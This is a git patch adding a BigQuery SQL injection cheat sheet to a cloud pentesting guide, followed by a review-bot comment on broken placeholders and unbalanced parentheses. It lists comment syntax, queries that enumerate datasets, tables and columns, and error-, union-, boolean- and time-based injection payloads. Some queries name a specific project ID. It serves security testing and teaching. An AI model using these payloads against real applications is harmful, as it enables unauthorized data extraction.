From 7f7bb18824bec281a42f081e62ec3dc8c2962363 Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 28 Feb 2024 21:51:54 +0000 Subject: [PATCH] GITBOOK-587: change request with no subject merged in GitBook --- .../gcp-services/gcp-bigquery-enum.md | 56 ++++++++++++++++++- 1 file changed, 55 insertions(+), 1 deletion(-) diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md index 9b30bccf9..16dff6b27 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md 
@@ -170,7 +170,61 @@ bq show --encryption_service_account # Get encryption service account ### BigQuery SQL Injection -[https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) +For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given. + +**Comments**: + +* `select 1#from here it is not working` +* `select 1/*between those it is not working*/` But just the initial one won't work +* `select 1--from here it is not working` + +Get **information** about the **environment** such as: + +* Current user: `select session_user()` +* Project id: `select @@project_id` + +Get **datasets**, **tables** and **column** names: + +* **Project** and **dataset** name: + +{% code overflow="wrap" %} +```sql +SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA +``` +{% endcode %} + +* **Column** and **table** names: + +{% code overflow="wrap" %} +```sql +# SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS + +SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFORMATION_SCHEMA.COLUMNS +``` +{% endcode %} + +* **Other datasets** in the same project: + +{% code overflow="wrap" %} +```sql +# SELECT catalog_name, schema_name, FROM .INFORMATION_SCHEMA.SCHEMATA + +SELECT catalog_name, schema_name, NULL FROM digital-bonfire-410512.INFORMATION_SCHEMA.SCHEMATA +``` +{% endcode %} + +**SQL Injection types:** + +* Error based - casting: `select CAST(@@project_id AS INT64)` +* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` +* Union based: `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#` +* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` 
limit 1),1,1)='A'#`` +* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000`` + +**Documentation:** + +* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting) ### Privilege Escalation & Post Exploitation
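Review bot: The two commented template queries in the "Column and table names" and "Other datasets" code blocks have lost their placeholders: `# SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS` and `# SELECT catalog_name, schema_name, FROM .INFORMATION_SCHEMA.SCHEMATA` show only the dots, so a reader cannot tell what belongs before `INFORMATION_SCHEMA` (angle-bracket placeholders were most likely stripped on the way through GitBook). Spell the placeholders out, for example `PROJECT_ID.DATASET_NAME.INFORMATION_SCHEMA.COLUMNS` and `PROJECT_ID.INFORMATION_SCHEMA.SCHEMATA`, and use the same placeholder in the two live queries instead of the hardcoded `digital-bonfire-410512`, so the page does not reference a specific real project. Two smaller documentation points: the "Comments" bullet `But just the initial one won't work` does not say which comment marker fails, so name it explicitly; and the union-based line ends with an unmatched `))`, which only makes sense for one particular injection context, so state that the parentheses must be adjusted to match the surrounding query rather than presenting it as a ready-made statement.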